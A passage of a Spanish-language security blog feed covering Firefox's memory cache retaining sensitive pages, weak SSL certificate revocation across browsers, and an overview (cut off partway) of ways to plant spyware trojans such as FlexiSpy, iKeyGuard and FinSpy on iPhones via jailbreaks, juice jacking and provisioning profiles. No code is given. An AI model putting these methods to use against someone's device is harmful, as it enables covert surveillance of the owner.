cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4QlkQUop2ww/UaZy8QG1dHI/AAAAAAAAIUE/35Us8mUQ5Pw/s1600/firefoxcache.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="http://2.bp.blogspot.com/-4QlkQUop2ww/UaZy8QG1dHI/AAAAAAAAIUE/35Us8mUQ5Pw/s640/firefoxcache.png" width="616" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;about:cache en Firefox&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Está característica es muy útil, junto a las herramientas de desarrollo, firebug, proxies, etcétera, para ver que elementos se han almacenado y en caso de que esté mal configurada, reportarlo como &lt;a href="https://www.owasp.org/index.php/Testing_for_Logout_and_Browser_Cache_Management_(OWASP-AT-007)"&gt;hallazgo en una auditaría web&lt;/a&gt; y esas cosas. Pero no es ahí donde quería llegar.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;¿Qué se guarda en la caché de memoria? de hecho, ¿&lt;b&gt;qué narices es la caché de memoria&lt;/b&gt;? ¿cómo se comporta ante las cabeceras mandadas por el servidor? La respuesta es simple: &lt;b&gt;guarda todo&lt;/b&gt;, incluso aunque se especifique rigurosamente que no se debe almacenar (&lt;span style="font-family: 'Courier New',Courier,monospace;"&gt;Cache-Control:&lt;/span&gt;&lt;span style="font-family: 'Courier New',Courier,monospace;"&gt;&amp;nbsp;no-store&lt;/span&gt;) porque son datos sensibles, como por ejemplo, correos electrónicos de un webmail, mensajes de tuenti, o qué se yo. En el fondo, esto tiene sentido, ya que el estándar dice que esas cabeceras solo se deben de usar para memoria no volátil, así que .. ¿ajo y agua?&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-dc2-eqmIbVM/UaZ4YjfTHZI/AAAAAAAAIUU/dZNKoJxAKq4/s1600/firefoxcache2.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="491" src="http://2.bp.blogspot.com/-dc2-eqmIbVM/UaZ4YjfTHZI/AAAAAAAAIUU/dZNKoJxAKq4/s640/firefoxcache2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;Entrada en cache de memoria de página HTTPS (con no-cache)&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Claro, para que Firefox funcione ha de usar este tipo de caché, ¿cómo no va a usarla? El problema no es que la use, si no lo sencillo que resulta acceder a la información (&lt;span style="font-family: Courier New,Courier,monospace;"&gt;about:cache&lt;/span&gt;) sin volcar la memoria del proceso a un fichero, ni técnicas &lt;i&gt;hackearianas&lt;/i&gt;. Además, parece no liberarla cuando corresponde, ya que al cerrar la pestaña sigue permaneciendo allí... olvidada, esperando ser consultada.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Realmente todo esto no es nuevo y los desarrolladores de Firefox tienen constancia de ello. &lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=619376"&gt;Hace 3 años debatieron&lt;/a&gt; sobre si suponía un problema de seguridad o no y llegaron a una conclusión, que bajo mi punto de vista es errónea por los motivos que ya he expuesto.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Pues nada, tan solo tened en cuenta que si usáis Firefox en un PC que no es el vuestro, no vale con darle a "cerrar sesión" y cerrar la pestaña, si no se cierra por completo el navegador, que el siguiente usuario vea tus secretos, es cuestión de segundos.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/4t-kNzy3WfI" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/la-memoria-cache-de-firefox-fallo-o.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/--WhGyfN43ys/UaZL_W1ADPI/AAAAAAAAIT0/RmL45SUw078/s72-c/ilustraciones-vectoriales-cronometro_18-4072.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-1741581051713784523</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:34.966-05:00</atom:updated><title>Certificados SSL irrevocables</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/0aop6J2lgWE/certificados-ssl-irrevocables.html"&gt;Certificados SSL irrevocables&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-FW1MKTFf0MU/UaVmnh5mVhI/AAAAAAAAB78/LCmzgUt-w20/s1600/netc.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="73" src="http://3.bp.blogspot.com/-FW1MKTFf0MU/UaVmnh5mVhI/AAAAAAAAB78/LCmzgUt-w20/s200/netc.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Uno de los pilares básicos en el 'mundo SSL/PKI' es la posibilidad de beneficiarse de poder contar con una entidad certificadora que, aparte de asegurar la identidad, sea capaz de gestionar posibles desastres revocando los certificados emitidos.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Esto, que parece algo obvio, se sigue haciendo mal en pleno 2013. Seguimos suspendiendo en algo que debería estar totalmente estandarizado y ser cumplido con la máxima rigurosidad.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Según leo de un artículo recientemente publicado por netcraft, algunas CAs reconocidas (aprobadas por Microsoft, Mozilla, etc) emiten certificados que son virtualmente irrevocables.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Veamos porque:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;De entrada los navegadores hacen de su capa un sayo y cada uno verifica el estado de los certificados como le da gana.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Existen dos formas de verificar si un certificado está vigente o ha sido revocado:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;-Usando CRLs: son ficheros donde aparecen los certificados revocados, el navegador debería descargar ese fichero y comprobar&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;-Usando &lt;a href="http://es.wikipedia.org/wiki/Online_Certificate_Status_Protocol"&gt;servicios OCSP&lt;/a&gt;: Mucho más óptimo que lo anterior, se lanza una llamada a un servicio OCSP preguntando por un certificado y el servicio responde si es o no es válido.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para implementar cualquiera de las formas anteriores, una CA debe poner esa información como parte del certificado que emite en el campo (extensión) apropiado. De esa forma, cuando se presenta un certificado al navegador, este tiene a mano alguno de estos dos métodos para verificar.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Como decía al principio, cada navegador tiene su propia forma de comprobar la validez de un certificado:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Firefox&lt;/b&gt; solo usa OCSP para comprobar la validez de los certificados digitales salvo que sea &lt;a href="http://www.securitybydefault.com/2009/06/certificados-digitales-con-validacion.html"&gt;un certificado EV&lt;/a&gt;. Esto significa que si solo hay disponible CRLs, no se valida nada. Además solo valida el certificado del servidor, no comprueba la validez de toda la cadena&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Explorer&lt;/b&gt; hace mejor las cosas y en este caso si comprueba tanto uno como otro método.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Google Chrome&lt;/b&gt; no implementa ninguno de los métodos estándar (salvo para certificados EV) y apuesta por gestionar una lista de certificados revocados propia que mantiene a base de updates. (Obvio pensar que esto funciona para grandes CAs pero habría que ver que sucede con otras locales)&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Safari&lt;/b&gt; por defecto directamente no comprueba nada salvo que sea un certificado EV&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Por si esto no fuese ya alarmante, algunas CAs directamente emiten certificados en los que no añaden ninguno de los métodos anteriores. Directamente generan un certificado totalmente irrevocable. Esto, que ya resulta poco aceptable para una implementación PKI 'casera', no tiene disculpa posible a nivel profesional.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Netcraft cita varios ejemplos de certificados así, y uno de ellos, el de https://sede.malaga.es/ ha sido emitido por la FNMT&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Otro ejemplo de certificado 'casi' irrevocable es el de https://accounts.google.com en este caso es solo 'casi' porque al menos implementa el sistema de CRLs, lo que significa que Explorer sí lo puede verificar pero Firefox no.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;[Referencias]&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://news.netcraft.com/archives/2013/05/23/would-you-knowingly-trust-an-irrevocable-ssl-certificate.html"&gt;Would you knowingly trust an irrevocable SSL certificate?&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://news.netcraft.com/archives/2013/05/13/how-certificate-revocation-doesnt-work-in-practice.html"&gt;How certificate revocation (doesn’t) work in practice&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/0aop6J2lgWE" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/certificados-ssl-irrevocables.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-FW1MKTFf0MU/UaVmnh5mVhI/AAAAAAAAB78/LCmzgUt-w20/s72-c/netc.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-1265168204198954764</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:29.355-05:00</atom:updated><title>Cómo meter un troyano en iOS y espiar un iPhone o iPad</title><description>&lt;a href="http://feedproxy.google.com/~r/ElLadoDelMal/~3/on42u1OZr-w/como-meter-un-troyano-en-ios-y-espiar.html"&gt;Cómo meter un troyano en iOS y espiar un iPhone o iPad&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;A pesar de que un terminal &lt;i&gt;&lt;b&gt;iPhone&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;iPad&lt;/b&gt;&lt;/i&gt; con &lt;i&gt;&lt;b&gt;iOS&lt;/b&gt;&lt;/i&gt; cuenta con muchas protecciones contra apps no deseadas en la &lt;i&gt;&lt;b&gt;AppStore&lt;/b&gt;&lt;/i&gt;, y de que el sistema está limitado a usuarios no privilegiados por defecto, siguen existiendo posibilidades y formas de meter un malware dentro de un terminal &lt;i&gt;&lt;b&gt;iPhone&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;iPad&lt;/b&gt;&lt;/i&gt; para espiar a su dueño. Esto es algo que se explica en detalle en el capítulo de &lt;i&gt;&lt;b&gt;Malware en iOS&lt;/b&gt;&lt;/i&gt; del &lt;a href="http://www.seguridadapple.com/2013/05/hacking-pentesting-dispositivos-ios.html"&gt;libro Hacking iOS: iPad &amp;amp; iPhone&lt;/a&gt;, pero os voy a hacer un resumen de las distintas posibilidades.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;1.- Terminal iPhone con Jailbreak usando Cydia&lt;/b&gt;: Si el usuario ha realizado &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; existen varias formas de instalarle el &lt;i&gt;&lt;b&gt;malware&lt;/b&gt;&lt;/i&gt; al terminal. La primera de ella sería posible instalar el troyano desde algún repositorio usando &lt;i&gt;&lt;b&gt;Cydia&lt;/b&gt;&lt;/i&gt;. Para ello habría que subir la &lt;i&gt;&lt;b&gt;app&lt;/b&gt;&lt;/i&gt; del troyano a &lt;i&gt;&lt;b&gt;Cydia&lt;/b&gt;&lt;/i&gt; u otro repositorio y convencer al usuario que instale esa aplicación con trucos de ingeniería social, como por ejemplo dentro de un juego.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-l7AqCmD7mh4/UaTavanIhmI/AAAAAAAAQM4/8oip_fwtMEk/s1600/FlexiSpy.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-l7AqCmD7mh4/UaTavanIhmI/AAAAAAAAQM4/8oip_fwtMEk/s1600/FlexiSpy.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 1: Pasos para instalar FlexiSpy en iOS con Jailbreak. Repositorios a añadir.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Muchos repositorios de &lt;i&gt;&lt;b&gt;apps&lt;/b&gt;&lt;/i&gt; con &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; no son tan escrupulosos en los controles y es posible subir una &lt;i&gt;&lt;b&gt;app&lt;/b&gt;&lt;/i&gt; con un troyano en ella. En los repositorios oficiales no es tan sencillo, pero como ya vimos ha habido algún caso de &lt;a href="http://www.seguridadapple.com/2012/08/desubierto-adware-en-cydia-para-hacer.html"&gt;apps maliciosas haciendo click fraud&lt;/a&gt; en este intro. El &lt;a href="http://www.seguridadapple.com/2013/02/espiariphone-con-flexispy-y-pillarlo.html"&gt;troyano FlexiSPY&lt;/a&gt; se descarga desde &lt;i&gt;&lt;b&gt;Cydia&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;b&gt;2.- Terminal con Jailbreak usando Juice Jacking:&lt;/b&gt; Si el terminal tiene &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; y no se han cambiado las contraseñas de los usuarios por defecto entonces se puede poner el troyano usando una conexión &lt;i&gt;&lt;b&gt;OpenSSH&lt;/b&gt;&lt;/i&gt; o &lt;i&gt;&lt;b&gt;USBMux&lt;/b&gt;&lt;/i&gt; con solo conectar el terminal a un equipo desde el que se va a hacer el &lt;a href="http://www.seguridadapple.com/2011/12/cuida-tu-iphone-o-tu-ipad-de-un-ataque.html"&gt;Juice Jacking&lt;/a&gt;. Un troyano que se puede instalar para este método es &lt;a href="http://www.seguridadapple.com/2011/04/ikeyguard-un-keylogger-para-iphone.html"&gt;iKeyGuard&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vrhB7stKRAo/UaTb3LJyqrI/AAAAAAAAQNI/a3sNNY0L8AA/s1600/iKeyGuard.png" style="margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-vrhB7stKRAo/UaTb3LJyqrI/AAAAAAAAQNI/a3sNNY0L8AA/s1600/iKeyGuard.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 2: Proceso de instalación de iKeyGuard en iOS con Jailbreak&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Nota: En la próxima BlackHat se ha anunciado la presentación de &lt;a href="http://www.seguridadapple.com/2013/06/mactans-un-cargador-que-troyaniza-tu.html"&gt;MacTrans, un cargador que por medio de Juice Jacking inyecta malware en un terminal iOS in jailbreak&lt;/a&gt;.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;3.- El terminal no tiene Jailbreak y tiene un passcode complejo pero tiene un chip A4&lt;/b&gt;: Los terminales &lt;i&gt;&lt;b&gt;iPhone 4&lt;/b&gt;&lt;/i&gt; y los &lt;i&gt;&lt;b&gt;iPad 1 &lt;/b&gt;&lt;/i&gt;cuentan con un bug &lt;i&gt;&lt;b&gt;Limera1n&lt;/b&gt;&lt;/i&gt; en el &lt;i&gt;&lt;b&gt;BootROOM&lt;/b&gt;&lt;/i&gt; que permite que se pueda hacer &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; en el arranque sin necesidad de conocer el &lt;i&gt;&lt;b&gt;passcode&lt;/b&gt;&lt;/i&gt;. Haciendo el &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; es posible instalar un &lt;i&gt;&lt;b&gt;Custom Bundle&lt;/b&gt;&lt;/i&gt; - un programa empaquetado que se ejecuta en el terminal - para meter &lt;i&gt;&lt;b&gt;OpenSSH&lt;/b&gt;&lt;/i&gt; o un malware con &lt;i&gt;&lt;b&gt;RedSn0w&lt;/b&gt;&lt;/i&gt; en el terminal una vez hecho el &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt;. Eso sí, el terminal quedaría con &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt; y el usuario podría darse cuenta, aunque los troyanos comerciales ocultan las pistas de ello. Es necesario tener acceso físico.&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-6QSrf4SSNi4/UaTe4lytg2I/AAAAAAAAQNY/lNZO5yTLNNs/s1600/redsn0w096rc821_custom_bundle.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-6QSrf4SSNi4/UaTe4lytg2I/AAAAAAAAQNY/lNZO5yTLNNs/s1600/redsn0w096rc821_custom_bundle.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 3: Instalación de Custom Bundle en un terminal con Jailbreak&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;4.- El terminal no tiene Jailbreak, pero tiene un chip A4 y un passcode sencillo:&lt;/b&gt; En ese caso lo mejor es hacer un proceso de ruptura del &lt;i&gt;&lt;b&gt;passcode&lt;/b&gt;&lt;/i&gt; haciendo un &lt;i&gt;&lt;b&gt;Untethered Jailbreak&lt;/b&gt;&lt;/i&gt; usando &lt;a href="http://www.seguridadapple.com/2013/01/data-protection-la-clave-de-la-wifi-y.html"&gt;iPhone DataProtection&lt;/a&gt; o &lt;i&gt;&lt;b&gt;Gecko&lt;/b&gt;&lt;/i&gt;. Una vez averiguado el &lt;i&gt;&lt;b&gt;passcode&lt;/b&gt;&lt;/i&gt; se reinicia el terminal para que pierda el &lt;i&gt;&lt;b&gt;Untethered Jailbreak&lt;/b&gt;&lt;/i&gt; y se inicia sesión con él &lt;i&gt;&lt;b&gt;passcode&lt;/b&gt;&lt;/i&gt; para instalar un troyano basado en un &lt;i&gt;&lt;b&gt;provisioning profile&lt;/b&gt;&lt;/i&gt; - fichero de despliegue temporal firmado por un &lt;i&gt;&lt;b&gt;Apple Developer ID&lt;/b&gt;&lt;/i&gt; -. Para ello será necesario tener acceso físico al terminal y haber creado un malware a medida - esto se explica en detalle en el &lt;a href="http://0xword.com/libros/39-libro-hacking-dispositivos-ios-iphone-ipad.html"&gt;libro de Hacking iOS: iPhone &amp;amp; iPad&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-tpThYaX9bdQ/UaTh_135ugI/AAAAAAAAQNo/th8A80UkFNs/s1600/FinSpy2.jpeg" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-tpThYaX9bdQ/UaTh_135ugI/AAAAAAAAQNo/th8A80UkFNs/s1600/FinSpy2.jpeg" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 4: Muestra de FinSpy para iOS firmada por un Apple Developer ID&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Este truco es el que utiliza &lt;a href="http://www.seguridadapple.com/2012/10/finspy-para-ios-troyanos-del-gobierno.html"&gt;FinSpy para iOS de FinFisher&lt;/a&gt; para hacer ataques dirigidos, y será necesario obtener del terminal no también el &lt;i&gt;&lt;b&gt;UDID&lt;/b&gt;&lt;/i&gt; para crear el &lt;i&gt;&lt;b&gt;provisioning profile&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;5.- El terminal no tiene Jailbreak y es un iPhone 4S o iPhone 5, así que se usa un Provisioning Profile:&lt;/b&gt; A pesar de que un terminal no tenga hecho el &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt;, si es posible convencer al usuario de que acepte un &lt;i&gt;&lt;b&gt;provisioning profile&lt;/b&gt;&lt;/i&gt; - o se ha podido &lt;a href="http://www.seguridadapple.com/2013/05/hacking-pentesting-dispositivos-ios.html"&gt;averiguar el passcode con algún truco local&lt;/a&gt; -, será posible instalar un troyano en el equipo si este va firmado digitalmente. Por ello, si se cuenta con un &lt;i&gt;&lt;b&gt;Apple Developer ID&lt;/b&gt;&lt;/i&gt; se puede firmar el código e instalarlo en el equipo aun no habiéndose hecho el &lt;i&gt;&lt;b&gt;Jailbreak&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br 